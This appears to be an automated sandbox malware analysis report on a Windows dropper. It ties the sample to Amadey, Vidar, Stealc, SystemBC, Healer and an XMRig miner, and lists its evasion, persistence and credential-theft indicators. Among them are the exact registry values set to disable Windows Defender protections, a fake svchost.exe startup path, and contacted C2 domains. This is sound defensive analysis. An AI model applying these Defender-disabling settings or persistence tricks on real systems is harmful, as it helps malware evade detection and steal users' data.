Malware Analysis Report

2025-04-03 09:24

Sample ID 250306-fd2rlazjx7
Target 81f74729d5804f8d12d6b03e9857f8598a2658f4affaf7179c17d183d11dcf7d
SHA256 81f74729d5804f8d12d6b03e9857f8598a2658f4affaf7179c17d183d11dcf7d
Tags
defense_evasion discovery spyware stealer amadey healer stealc systembc vidar xmrig 092155 ir7am traff1 credential_access dropper evasion execution miner persistence trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

81f74729d5804f8d12d6b03e9857f8598a2658f4affaf7179c17d183d11dcf7d

Threat Level: Known bad

The file 81f74729d5804f8d12d6b03e9857f8598a2658f4affaf7179c17d183d11dcf7d was found to be: Known bad.

Malicious Activity Summary

Stealc family

Detect Vidar Stealer

SystemBC

Vidar

Modifies Windows Defender DisableAntiSpyware settings

Modifies Windows Defender Real-time Protection settings

xmrig

Vidar family

Detects Healer, an antivirus disabler dropper

Systembc family

Amadey

Healer family

Modifies Windows Defender TamperProtection settings

Stealc

Healer

Xmrig family

Modifies Windows Defender notification settings

Amadey family

XMRig Miner payload

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Downloads MZ/PE file

Command and Scripting Interpreter: PowerShell

Uses browser remote debugging

Blocklisted process makes network request

Drops startup file

Reads user/profile data of local email clients

Identifies Wine through registry keys

Reads user/profile data of web browsers

.NET Reactor protector

Checks computer location settings

Executes dropped EXE

Reads data files stored by FTP clients

Windows security modification

Checks BIOS information in registry

Loads dropped DLL

Unsecured Credentials: Credentials In Files

Adds Run key to start application

Legitimate hosting services abused for malware hosting/C2

Accesses cryptocurrency files/wallets, possible credential harvesting

Checks installed software on the system

Suspicious use of NtSetInformationThreadHideFromDebugger

Enumerates processes with tasklist

Suspicious use of SetThreadContext

AutoIT Executable

Drops file in Windows directory

Program crash

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Unsigned PE

Browser Information Discovery

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Kills process with taskkill

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Modifies data under HKEY_USERS

Scheduled Task/Job: Scheduled Task

Suspicious use of FindShellTrayWindow

Suspicious use of SetWindowsHookEx

Checks processor information in registry

Suspicious use of UnmapMainImage

Modifies registry class

Enumerates system info in registry

Suspicious use of SendNotifyMessage

Delays execution with timeout.exe

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2025-03-06 04:46

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-03-06 04:46

Reported

2025-03-06 04:48

Platform

win7-20240903-en

Max time kernel

121s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\81f74729d5804f8d12d6b03e9857f8598a2658f4affaf7179c17d183d11dcf7d.exe"

Signatures

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\81f74729d5804f8d12d6b03e9857f8598a2658f4affaf7179c17d183d11dcf7d.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\81f74729d5804f8d12d6b03e9857f8598a2658f4affaf7179c17d183d11dcf7d.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\81f74729d5804f8d12d6b03e9857f8598a2658f4affaf7179c17d183d11dcf7d.exe N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\81f74729d5804f8d12d6b03e9857f8598a2658f4affaf7179c17d183d11dcf7d.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\81f74729d5804f8d12d6b03e9857f8598a2658f4affaf7179c17d183d11dcf7d.exe N/A

Browser Information Discovery

discovery

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\81f74729d5804f8d12d6b03e9857f8598a2658f4affaf7179c17d183d11dcf7d.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\81f74729d5804f8d12d6b03e9857f8598a2658f4affaf7179c17d183d11dcf7d.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\81f74729d5804f8d12d6b03e9857f8598a2658f4affaf7179c17d183d11dcf7d.exe

"C:\Users\Admin\AppData\Local\Temp\81f74729d5804f8d12d6b03e9857f8598a2658f4affaf7179c17d183d11dcf7d.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2512 -s 1240

Network

Country Destination Domain Proto
US 8.8.8.8:53 circujitstorm.bet udp
US 8.8.8.8:53 hardswarehub.today udp
US 8.8.8.8:53 gadgethgfub.icu udp
US 8.8.8.8:53 hardrwarehaven.run udp
US 8.8.8.8:53 techmindzs.live udp
US 8.8.8.8:53 codxefusion.top udp
US 104.21.69.194:443 codxefusion.top tcp

Files

memory/2512-0-0x0000000001170000-0x000000000148C000-memory.dmp

memory/2512-1-0x0000000077280000-0x0000000077282000-memory.dmp

memory/2512-2-0x0000000001171000-0x00000000011D1000-memory.dmp

memory/2512-3-0x0000000001170000-0x000000000148C000-memory.dmp

memory/2512-4-0x0000000001170000-0x000000000148C000-memory.dmp

memory/2512-5-0x0000000001170000-0x000000000148C000-memory.dmp

memory/2512-7-0x0000000001170000-0x000000000148C000-memory.dmp

memory/2512-8-0x0000000001171000-0x00000000011D1000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2025-03-06 04:46

Reported

2025-03-06 04:48

Platform

win10v2004-20250217-en

Max time kernel

144s

Max time network

151s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

Amadey family

amadey

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects Healer, an antivirus disabler dropper

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Healer

dropper healer

Healer family

healer

Modifies Windows Defender DisableAntiSpyware settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" C:\Users\Admin\AppData\Local\Temp\10110380101\1109dfe086.exe N/A

Modifies Windows Defender Real-time Protection settings

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\10110380101\1109dfe086.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\10110380101\1109dfe086.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\10110380101\1109dfe086.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\10110380101\1109dfe086.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\10110380101\1109dfe086.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\10110380101\1109dfe086.exe N/A

Modifies Windows Defender TamperProtection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\10110380101\1109dfe086.exe N/A

Modifies Windows Defender notification settings

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications C:\Users\Admin\AppData\Local\Temp\10110380101\1109dfe086.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" C:\Users\Admin\AppData\Local\Temp\10110380101\1109dfe086.exe N/A

Stealc

stealer stealc

Stealc family

stealc

SystemBC

trojan systembc

Systembc family

systembc

Vidar

stealer vidar

Vidar family

vidar

Xmrig family

xmrig

xmrig

miner xmrig

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\UVR9XS062SFG8N10I3ILODHN4VDMVRY.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10110290101\rXOl0pp.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10110330101\9d1cfbdeaf.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\81f74729d5804f8d12d6b03e9857f8598a2658f4affaf7179c17d183d11dcf7d.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10110250101\FvbuInU.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10110340101\2fec6d6e6a.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10110350101\351688018b.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\3MTOO6AB2FMOS3KK0QLMB4.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10110380101\1109dfe086.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\ProgramData\rvhetm\ktgtc.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10110210101\v6Oqdnc.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10110310101\b0fc94a113.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10110360101\6dde3a1917.exe N/A

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110350101\351688018b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110290101\rXOl0pp.exe N/A
N/A N/A C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\81f74729d5804f8d12d6b03e9857f8598a2658f4affaf7179c17d183d11dcf7d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A

Uses browser remote debugging

credential_access stealer
Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

.NET Reactor protector

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\ProgramData\rvhetm\ktgtc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10110350101\351688018b.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\UVR9XS062SFG8N10I3ILODHN4VDMVRY.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10110210101\v6Oqdnc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10110310101\b0fc94a113.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10110330101\9d1cfbdeaf.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10110350101\351688018b.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\3MTOO6AB2FMOS3KK0QLMB4.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10110380101\1109dfe086.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\81f74729d5804f8d12d6b03e9857f8598a2658f4affaf7179c17d183d11dcf7d.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\UVR9XS062SFG8N10I3ILODHN4VDMVRY.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10110330101\9d1cfbdeaf.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10110340101\2fec6d6e6a.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10110340101\2fec6d6e6a.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\ProgramData\rvhetm\ktgtc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\81f74729d5804f8d12d6b03e9857f8598a2658f4affaf7179c17d183d11dcf7d.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10110210101\v6Oqdnc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10110310101\b0fc94a113.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10110360101\6dde3a1917.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10110380101\1109dfe086.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10110250101\FvbuInU.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10110290101\rXOl0pp.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\3MTOO6AB2FMOS3KK0QLMB4.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10110250101\FvbuInU.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10110360101\6dde3a1917.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10110290101\rXOl0pp.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\10110270101\nhDLtPT.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\UVR9XS062SFG8N10I3ILODHN4VDMVRY.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\10110200101\PcAIvJ0.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe C:\Users\Admin\AppData\Local\Temp\10110190101\zY9sqWs.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe C:\Users\Admin\AppData\Local\Temp\10110190101\zY9sqWs.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win_update.vbs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\UVR9XS062SFG8N10I3ILODHN4VDMVRY.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110190101\zY9sqWs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110200101\PcAIvJ0.exe N/A
